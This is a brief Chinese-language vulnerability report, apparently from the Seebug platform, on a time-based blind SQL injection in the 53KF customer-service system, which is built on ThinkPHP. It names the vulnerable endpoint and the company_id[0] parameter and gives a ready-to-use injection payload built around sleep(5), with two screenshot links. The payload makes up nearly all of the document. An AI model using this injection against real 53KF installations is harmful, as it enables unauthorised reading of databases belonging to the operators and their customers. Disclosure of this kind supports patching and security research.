利用过程:
53KF 采用ThinkPHP框架,
注入地址:http://xxx.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=1,company_id[0]存在时间盲注
![](https://images.seebug.org/contribute/a7ab2429-e25a-4b4f-8d54-b4d4500d4545)
payload:
/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=-1%20or%201!=sleep(5)))limit%201%23between
![](https://images.seebug.org/contribute/14d8f69d-b126-4110-9e2f-aa8b4a2ee062)
暂无评论